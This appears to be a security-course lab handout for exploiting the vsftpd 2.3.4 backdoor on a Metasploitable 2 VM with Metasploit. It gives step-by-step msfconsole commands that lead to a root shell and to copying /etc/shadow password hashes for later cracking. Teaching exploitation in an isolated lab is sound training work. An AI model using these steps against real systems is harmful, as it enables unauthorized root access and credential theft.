Lab 09 - Metasploit Framework
Introduction
In this lab you will use the Metasploit Framework, which is used to create code that can exploit vulnerabilities. These exploits can have different payloads. Payloads are the actual code that is executed on the target system such as creating a reverse shell or setting up a remotely accessible server. As new code is developed for newly discovered vulnerabilities, a plug-in is created and then added to the repository.
Lab Goals
After completing this lab, you will be able to
- Use the Metasploit Framework to exploit a given vulnerability
Specifically, you will be using MSF to exploit the vsftp 234 backdoor vulnerability. This vulnerability enables an attacker to remotely execute code without restriction. This can allow an attacker to have access to the “keys to the kingdom,” the password hashes, which can later be cracked and then used to gain full access to the system and network. Here are the steps at a glance:
- Log on to both the Kali and Metasploitable 2 PCs.
- Configure Metasploit.
- Run the exploit.
- Log off from both the Kali and Metasploitable 2 PCs.
Setup
You should have kali and the metasploitable machine installed.
Lab Steps
Step 1: Log on to both the Kali and Metasploitable 2 PCs.
Step 2: Configure Metasploit.
- Click the Terminal icon.
- In the Terminal window, type msfconsole and press ENTER. Note The Metasploit console may take a few minutes to start up.
- At the msf prompt, type help and press ENTER. This displays the commands that can be used in the Metasploit console.
- What command displays modules of a given type?
- What command allows you to assign a value to a variable?
- What command selects a module by name?
In the Metasploit console, type search vsftpd and press ENTER. You should see the exploit for the vsftpd vulnerability loaded.
- What is the exact name of the exploit?
In the Metasploit console, type use exploit/unix/ftp/vsftpd_234_backdoor and press ENTER. The Metasploit console will display a new prompt with the name of the exploit in red. If that does not happen, then you may have typed or pasted the command incorrectly.
Type show options and press ENTER. Note you will need to set is the remote host (RHOST), which is the IP address of the target machine. In this case, it’s Metasploitable. You will set the remote port (RPORT), which is port 21 for FTP. You will also set the local host (LHOST) or the Kali machine, which is not listed.
- At the command prompt, do the following:
Type set RHOST 192.168.1.X where X is the correct IP of your metasploitable machine, and press ENTER.
Type set RPORT 21 and press ENTER.
Type set LHOST 192.168.1.Y where Y is your Kali IP, and press ENTER. Next you will deliver a payload. Exploits can have different payloads. To see what payloads are available for this exploit, do the following:
Type show payloads and press ENTER. There is only one payload available, and it is labeled cmd/unix/interact. This will allow you to interact with the remote machine without having to log in.
In the Metasploit console, type set PAYLOAD cmd/unix/interact and press ENTER. You have loaded the module.
Step 3: Run the exploit: You are now ready to run the exploit.
In the Metasploit console, type exploit and press ENTER. If it worked properly, you will see the following:
- [+] Backdoor service has been spawned, handling…
- [+] uid=0(root) gid=0(root) -
This mean you have a back door into Metasploitable, and you are in as the root user. Let’s type a few commands and see what we can do.
At the prompt, type whoami and press ENTER.
- Who are you?
At the prompt, type pwd and press ENTER.
- Where are you in the directory structure of Metasploitable? Let’s grab some password hashes so that we try to crack passwords in a later lab.
Type cat /etc/shadow and press ENTER.
- With your mouse, highlight all of the text, right-click, and select Copy.
- Right-click the desktop and select Create New Text Document | Empty Document.
Name the document MetaHashes.txt and press ENTER.
- Right-click the text document and select Open With | Leafpad.
- Paste the text into the text document.
- Close the document and save the changes.
We have successfully connected to the machine via a back door and infiltrated the hashes for cracking passwords. You can do just about anything with and to this machine. You might add users or delete files, clear logs, and so on. For now, what we have will do is logout.
Show Me
These steps are pretty easy and you should be able to show me them in just a minute. Create a video that contains the following:
- Show the MSF setup and exploit to the point of getting a command prompt
- Show that you can retrieve the shadow file by showing its contents.